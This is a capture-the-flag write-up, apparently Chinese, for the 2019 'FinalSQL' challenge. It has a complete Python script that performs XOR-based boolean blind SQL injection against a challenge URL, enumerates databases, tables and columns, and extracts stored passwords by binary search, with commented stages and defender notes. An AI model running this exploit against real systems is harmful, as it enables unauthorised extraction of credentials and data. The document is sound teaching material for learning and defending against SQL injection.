[极客大挑战 2019]FinalSQL
一道布尔盲注题。主要是要记住多 fuzz。
像布尔盲注这种，要多看回显。确定了是布尔盲注就简单多了，这题就是 fuzz 出来了 `^`，然后可以用异或注入。
# Boolean-based blind SQL injection driver for the "[极客大挑战 2019]FinalSQL"
# challenge.  The condition is injected into the `id` parameter through XOR
# (`1^(cond)^1` evaluates to `cond`), and the presence of the word "Click" in
# the response body is the true/false oracle.  Each character of the result is
# recovered with a binary search over the ASCII range [32, 128), i.e. roughly
# seven requests per character.
#
# Defender's view: the oracle only exists because `id` is spliced into the SQL
# text server-side; a parameterized query, or casting `id` to an integer before
# use, removes it.  In access logs this traffic shows up as a burst of requests
# to search.php whose `id` values differ only in the two integers embedded in
# the substr()/comparison of the payload.
import requests
import time

# Challenge instance's search endpoint; requests appends the query string
# built from `temp`.
url="http://c4e97744-291f-4ace-b150-02a27c477086.node4.buuoj.cn:81/search.php?"
# The single query parameter; the payload is written into temp["id"] before
# every request.
temp={"id":""}
# Characters recovered so far.
flag= ""
# `i` is the 1-based position passed to substr(); 1000 is just an upper bound,
# the loop normally ends via the break below.
for i in range(1,1000):
    # Pacing between characters (presumably to stay under the platform's
    # rate limit — the page does not say).
    time.sleep(0.06)
    # Binary-search bounds over ASCII 32..127.
    low=32
    high=128
    mid=(low+high)//2
    while(low<high):
        # The earlier enumeration stages are kept as commented-out payloads;
        # only the last one is active.
        # database names
        #temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, mid)
        # table names
        #temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))>%d)^1" %(i,mid)
        # column names
        #temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
        # row contents: asks whether character i of the concatenated column
        # has an ASCII code greater than `mid`
        temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" %(i,mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        # Progress trace: current bounds and probe value.
        print(low, high, mid, ":")
        # Oracle: "Click" in the body means the condition held, so the
        # character is above `mid`; otherwise it is at or below `mid`.
        if "Click" in r.text:
            low = mid + 1
        else:
            high = mid
        # Recomputed after narrowing, so on exit (low == high) mid is the
        # recovered code.
        mid = (low + high) // 2
    # A search that collapses to the bottom (32) or top (127) of the range is
    # treated as "no character here" — presumably the end of the string — and
    # stops extraction.  NOTE(review): a genuine space in the data would also
    # stop it; confirm against the expected output.
    if (mid == 32 or mid == 127):
        break
    flag += chr(mid)
    print(flag)
print("终于等到你", flag)
